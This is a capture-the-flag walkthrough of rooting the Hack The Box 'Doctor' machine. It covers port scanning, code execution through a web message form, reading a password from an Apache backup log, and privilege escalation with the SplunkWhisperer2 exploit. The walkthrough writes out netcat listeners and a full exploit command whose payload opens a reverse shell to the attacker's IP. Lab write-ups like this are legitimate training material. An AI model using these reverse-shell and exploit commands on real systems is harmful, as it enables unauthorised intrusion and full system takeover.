Doctor HackTheBox WalkThrough
This is Doctor HackTheBox Walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
Doctor HTB machine. Before starting let us know something about this machine. It is a
Linux box with IP address
10.10.10.209 and difficulty level
easy assigned by it’s maker.
First of all connect your PC with
VPN and confirm the connectivity with doctor machine by pinging the IP 10.10.10.209. If all goes correct then start hacking. As usual, I started by scanning the box.
Nmap (a port scanner) gave the following result:-
$ nmap -sC -sV -oN doctor 10.10.10.209
Nmap revealed port 22, 80 and 8089 are open.
OpenSSH on port
Apache2 web server on port
Splunkd server on port
8089 are running. Since apache2 web server is running so there must be some website hosted on this server. The website can be accessed by the URL http://10.10.10.209:80 or simply http://10.10.10.209/. After going to this URL find a website that appears as below
Tried to check the
page source by pressing
CTRL+U, for the
CMS (if any) from which this website is made but, could not found. If there would be some CMS as if WordPress I would use
wpscan (WordPress vulnerability scanner) because these scanners are specially made for WordPress websites so they will enumerate a lot more than what we do manually. Since we do not have any CMS, therefore we have to enumerate manually.
After some initial enumeration got an email address
[email protected] at the URL http://10.10.10.209/. This email contains a domain name
doctors.htb so added this domain to my hosts file which is present in directory
/etc/. In case if there will be some
virtual hosting enabled we would get some other website.
Host File after Modification
$ cat /etc/hosts
Since I do not have any login credential so clicked on
Register to create an account with the following credential.
If you are getting signup or login problem then use incognito mode in Firefox browser.
Now after signup, logged in with the following credential
We are inside the
home folder. Clicked on
New Message to write some message. After trying some basic
SQLi payloads found a way by which I could communicate with my local machine through this website. Alternatively, we can say, I got a connection from doctor machine to my local machine. To test this, started a
netcat listener to listen
on port 80 on my kali machine. Then inserted an
<img> tag with my tun0 IP in src and clicked on
Post to post the content to the web server.
Although got an error denoting a
non-valid link but the link did its work as you can see in above screenshot. After spending, some more time on this page got a way by which we can execute code on doctor machine.
To test RCE, we have to start python web server on our local machine and look carefully to the
REQUESTS, which is made to this server from the website. To confirm the
RCE type the code
Content box and after posting the script you will get a REQUEST on your web server and it will also contain the
uid of the user who is running the command (here web). From this, we can
confirm Remote Code Execution on doctor machine.
You can get a remote shell on this machine in multiple ways. I just tried to execute shell command using
nc.traditional backdoor, which is present on
doctor machine and got shell. One thing I want to clear that I did not know previously that doctor machine actually has
nc.traditional installed. Recently, on almost every HTB boxes I found
netcat software previously installed that is why I just checked it, in hope to get present there, and it does.
Getting User Shell
To get remote shell started netcat listener to
listen on port 2345 and
Posted the following code in the Content section of the website.
$ nc –nvlp 2345 #On your terminal
And below code on Content Section of the doctor website
$IFS is called
Internal Field Separator in shell script whose default value is space.
We got a shell. Let us upgrade the shell to a fully qualified Linux shell so that we can run advanced Linux command, which requires fully qualified Linux shell.
~which python3 //Checking if python3 is installed or not on the doctor machine
~python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
There are two users namely
/home/ directory of doctor. Tried, to switch the user to
shuan but it requires password and until now, we do not have any credentials. So ran
linpeas.sh [a post exploitation enumeration script] to check whether we can find any credentials or privilege escalation vector. Linpeas.sh found a password
Guitar123 inside the
backup file of
apache2 folder. The file is present at the directory
grep the password from the
backup file using the following command
$ grep -i pass /var/log/apache2/backup
We have a password
Guitar123 but do not know whose credential it is. Tried to use this credential for user
shaun and could successfully switched to shaun.
$ su shaun
Capture User Flag
$ cat /home/shaun/user.txt
Finding PrivEsc Vector
After following the steps as directed, I could escalate the privilege very easily. So here, our privilege escalation vector is
Splunk Universal Forwarder Hijacking. For more info about this read this article.
To escalate the privilege I did the following things.
1. Started netcat listener in one window
$ nc -nvlp 1234
2. Cloned the repository in my PC
$ git clone https://github.com/cnotin/SplunkWhisperer2.git
3. Change the directory to the exploit folder
$ cd SplunkWhisperer2/PySplunkWhisperer2
4. Run the exploit using the following command
$ python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.15 --username shaun --password Guitar123 --payload 'nc.traditional -e/bin/sh 10.10.14.15 1234'
$ nc -nvlp 1234
Got a root shell. Let’s capture the root flag.
Capture Root Flag
This is how I rooted to Doctor HackTheBox. Learnt a lot after hunting this machine. Hope you guys have also learnt some new things from this machine writeup. Thanks for reading this writeup. For any suggestion and query related to walkthrough, feel free to write us at [email protected].